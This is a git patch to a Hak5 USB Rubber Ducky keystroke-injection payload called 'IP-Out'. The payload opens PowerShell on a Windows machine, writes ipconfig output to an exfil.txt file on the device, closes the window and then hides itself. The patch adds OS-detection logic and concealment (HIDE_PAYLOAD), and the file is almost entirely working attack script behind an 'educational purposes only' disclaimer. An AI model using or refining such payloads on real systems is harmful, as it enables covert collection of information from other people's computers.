From 0f85a6936e8f97b6947101928e5689d5f90b8b23 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Thu, 26 Sep 2024 06:09:19 -0700
Subject: [PATCH] Update payload.txt

---
 .../library/credentials/IP-Out/payload.txt    | 55 ++++++++++++++++---
 1 file changed, 47 insertions(+), 8 deletions(-)

diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index 41481a9..8b2dc8e 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -2,20 +2,59 @@ REM Title: IP-Out
 REM Author: Mavisinator30001
 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
 REM Target: Any Windows System
-REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+DEFINE #DRIVELABEL D
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
 ATTACKMODE HID STORAGE
 DELAY 500
 GUI r
 DELAY 300
-STRING Powershell
-ENTER
+STRINGLN Powershell
 DELAY 1000
-STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
-ENTER
+STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
 ALT F4
 ATTACKMODE OFF
-REM And should the attacker want to make sure the payload was successful:
-WAIT_FOR_BUTTON_PRESS
-ATTACKMODE STORAGE
+HIDE_PAYLOAD